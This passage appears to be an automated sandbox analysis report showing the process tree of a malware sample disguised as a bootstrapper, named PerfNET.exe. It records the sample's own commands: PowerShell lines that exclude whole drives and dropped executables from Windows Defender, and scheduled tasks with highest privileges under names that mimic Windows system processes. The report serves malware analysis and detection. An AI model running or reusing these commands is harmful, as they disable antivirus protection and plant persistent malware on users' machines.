- Command and Scripting Interpreter: PowerShell
PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:5740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\regid.1991-06.com.microsoft\SppExtComObj.exe'6⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\CRMLog\sppsvc.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Updates\Apply\System.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\unsecapp.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HWoyrIkOXn.bat"6⤵PID:1264
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:972
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:3136
-
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:6340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\regid.1991-06.com.microsoft\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Windows\Registration\CRMLog\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
PID:1536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\Registration\CRMLog\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:6388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\System.exe'" /f1⤵
- Process spawned unexpected child process
PID:2804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Apply\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:5144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\ssh\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\All Users\ssh\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\ssh\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNET" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3584
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6504 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 9F1622552D200DDAB716B8E5DBA80F9B2⤵
- Loads dropped DLL
PID:4472
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FE944FB42782CC31673F329CF447448E2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6740
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 022EF14883F3DBE9F5BF74E46F8CB041 E Global\MSI00002⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5124 -
C:\Windows\SysWOW64\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"3⤵
- System Location Discovery: System Language Discovery
PID:7072 -
C:\Windows\System32\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow644⤵PID:4060
-
-
-
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\BootstrapperV1.19.exe"1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:7160
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe1⤵
- Opens file in notepad (likely ransom note)
PID:3380
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\5sOqbfN.bat1⤵
- Opens file in notepad (likely ransom note)
PID:984
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\DISCORD"1⤵PID:5144
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\5sOqbfN.bat1⤵
- Opens file in notepad (likely ransom note)
PID:3404
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:6464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'2⤵PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:1588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'2⤵PID:6312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:1256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'2⤵PID:5700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msiexec.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:4656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\de-DE\msedge.exe'2⤵PID:5788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\OfficeClickToRun.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:8
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\chrome.exe'2⤵PID:5176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Recent\ApplicationFrameHost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:2736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\PerfNET.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mFprvTfBTu.bat"2⤵PID:5816
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:6964
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4852
-
-
C:\Recovery\WindowsRE\OfficeClickToRun.exe"C:\Recovery\WindowsRE\OfficeClickToRun.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:5068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Qf9bALi5DQ.bat"4⤵PID:2116
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:4900
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:25⤵PID:5876
-
-
C:\Recovery\WindowsRE\OfficeClickToRun.exe"C:\Recovery\WindowsRE\OfficeClickToRun.exe"5⤵
- Executes dropped EXE
PID:6384
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:3688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chromec" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\chrome.exe'" /f1⤵
- Process spawned unexpected child process
PID:6324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Users\Default User\chrome.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chromec" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\chrome.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Recent\ApplicationFrameHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default\Recent\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:344
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Recent\ApplicationFrameHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNET" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1580
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\ef8394841442c3"1⤵PID:3772
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:1936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:1816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'2⤵PID:6400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'2⤵PID:1740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:3652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'2⤵PID:6840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'2⤵PID:6592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\3D Objects\unsecapp.exe'2⤵PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\L2Schemas\notepad.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\wininit.exe'2⤵PID:4820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\services.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Registry.exe'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\PerfNET.exe'2⤵PID:4032
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tr3YOaQkiZ.bat"2⤵PID:952
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:5568
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:4080
-
-
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Registry.exe"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Registry.exe"3⤵
- Executes dropped EXE
PID:4724
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\3D Objects\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\3D Objects\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "notepadn" /sc MINUTE /mo 12 /tr "'C:\Windows\L2Schemas\notepad.exe'" /f1⤵
- Process spawned unexpected child process
PID:6616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "notepad" /sc ONLOGON /tr "'C:\Windows\L2Schemas\notepad.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "notepadn" /sc MINUTE /mo 7 /tr "'C:\Windows\L2Schemas\notepad.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Pictures\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\Public\services.exe'" /f1⤵
- Process spawned unexpected child process
PID:5316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Users\Public\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNET" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "PerfNETP" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Desktop\PerfNET.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2312
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3700 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iPELUvEZwh.bat"2⤵PID:4992
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:2160
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:2804
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"3⤵
- Executes dropped EXE
PID:748
-
-
-
C:\Users\Admin\Desktop\PerfNET.exe"C:\Users\Admin\Desktop\PerfNET.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:6952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'2⤵PID:6812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:5852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'2⤵
- Command and Scripting Interpreter: PowerShell
PID:6832
-
-
